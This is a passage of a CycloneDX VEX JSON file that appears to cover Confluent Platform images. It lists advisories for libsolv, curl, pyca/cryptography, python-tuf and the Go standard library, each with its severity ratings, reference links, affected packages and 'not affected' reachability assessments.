          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9150",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30649"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9150"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/616"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9150.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9150"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9150"
        }
      ],
      "published": "2026-05-20T23:16:36+00:00",
      "updated": "2026-07-31T18:17:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.7.24-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9547",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When a libcurl-based application performs transfers via `SCP://` or `SFTP://`\nand utilizes the `CURLOPT_SSH_KEYFUNCTION` callback, it may silently accept an\nuntrusted server. This vulnerability occurs when a server presents a host key\ntype that does not match the specific key type already recorded for that host\nin the `known_hosts` file. Instead of rejecting the mismatch, the callback\nmechanism fails to properly enforce the restriction, allowing the connection\nto succeed without warning and risking a potential man-in-the-middle attack.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9547"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-9547.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-9547.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-9547.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-xq9p-gxg6-f7q6"
        },
        {
          "url": "https://hackerone.com/reports/3751712"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9547.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9547"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9547"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T14:52:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "GHSA-537c-gmf6-5ccf",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in wheels prior to cryptograph 48.01 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20260609.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",
      "recommendation": "Upgrade cryptography to version 48.0.1",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        }
      ],
      "published": "2026-06-15T20:12:27+00:00",
      "updated": "2026-06-15T20:12:27+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the flaw is the OpenSSL bundled inside the Python cryptography wheel; the product does not process attacker-controlled cryptographic input through that Python path, so the vulnerable code is not reachable."
      }
    },
    {
      "id": "GHSA-qp9x-wp8f-qgjj",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "description": "`DelegatedRole._is_target_in_pathpattern` uses `fnmatch.fnmatch` to decide whether a given target path is authorized by a delegation's glob pattern.\n\nPython's `fnmatch.fnmatch` calls `os.path.normcase()` on both arguments before matching. On POSIX hosts `normcase` is the identity function; on Windows hosts `os.path` resolves to `ntpath`, whose `normcase` lowercases its input and replaces `/` with `\\`.\n\nAs a result, python-tuf's delegation *path pattern* matching is case-sensitive on Linux/macOS but case-INSENSITIVE on Windows. This makes the authorization decision for a target dependent on the host operating system of the client running the updater.\n\nThe result on Windows is a TUF specification violation in the python-tuf `ngclient` implementation.\n\n## Vulnerable code\n\n`tuf/api/_payload.py` (HEAD `7ecb67d`):\n\n```python\n1183  @staticmethod\n1184  def _is_target_in_pathpattern(targetpath: str, pathpattern: str) -> bool:\n1185      \"\"\"Determine whether ``targetpath`` matches the ``pathpattern``.\"\"\"\n1186      # We need to make sure that targetpath and pathpattern are pointing to\n1187      # the same directory as fnmatch doesn't threat \"/\" as a special symbol.\n1188      target_parts = targetpath.split(\"/\")\n1189      pattern_parts = pathpattern.split(\"/\")\n1190      if len(target_parts) != len(pattern_parts):\n1191          return False\n1192\n1193      # Every part in the pathpattern could include a glob pattern, that's why\n1194      # each of the target and pathpattern parts should match.\n1195      for target, pattern in zip(target_parts, pattern_parts, strict=True):\n1196          if not fnmatch.fnmatch(target, pattern):\n1197              return False\n1198      return True\n```\n\n`fnmatch.fnmatch` source (Python 3.12, unchanged in current mainline):\n\n```python\ndef fnmatch(name, pat):\n    ...\n    name = os.path.normcase(name)\n    pat = os.path.normcase(pat)\n    return fnmatchcase(name, pat)\n```\n\n## Fix\n\nReplace `fnmatch.fnmatch` with `fnmatch.fnmatchcase`, which is explicitly documented as \"not applying case normalization\", so it behaves identically across platforms.\n\n## Attack\n\n1. A TUF repository with two path-based delegations whose patterns differ only in case \u2014 for example, `Foo/*` and `foo/*`.\n2. The \"attacker\" delegation is listed BEFORE the \"legit\" delegation in the delegation order.\n3. The client searches for `foo/something`: on Windows, it will find the \"attacker\" provided target \"Foo/something\".\n\n\n## Exploitability caveats \n\n* The attack needs a repository configuration with case-colliding delegation path patterns. The attacker must control one of the delegated roles.\n* Delegation ordering matters: the attacker-controlled role must be visited BEFORE the legit role in the pre-order walk.\n* The client must run on Windows. No effect on Linux/macOS.\n\n## Credit\n\nReporter: Koda Reef @kodareef5 \nAdvisory edits: Jussi Kukkonen @jku",
      "recommendation": "Upgrade tuf to version 7.0.0",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-qp9x-wp8f-qgjj"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/releases/tag/v7.0.0"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-qp9x-wp8f-qgjj"
        }
      ],
      "published": "2026-05-28T22:46:13+00:00",
      "updated": "2026-05-28T22:46:13+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/tuf@6.0.0",
          "versions": [
            {
              "version": "6.0.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/tuf@6.0.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. python-tuf is not used to verify attacker-controlled update metadata in the product runtime, so the delegation path-matching flaw is not reachable."
      }
    },
    {
      "id": "CVE-2026-33818",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Enforce a recursion limit in Unmarshal to prevent stack exhaustion when parsing deeply-nested, recursive structures.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33818"
        },
        {
          "url": "https://go.dev/cl/814980"
        },
        {
          "url": "https://go.dev/issue/80405"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33818"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33818"
        }
      ],
      "published": "2026-08-13T22:17:19+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39821",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
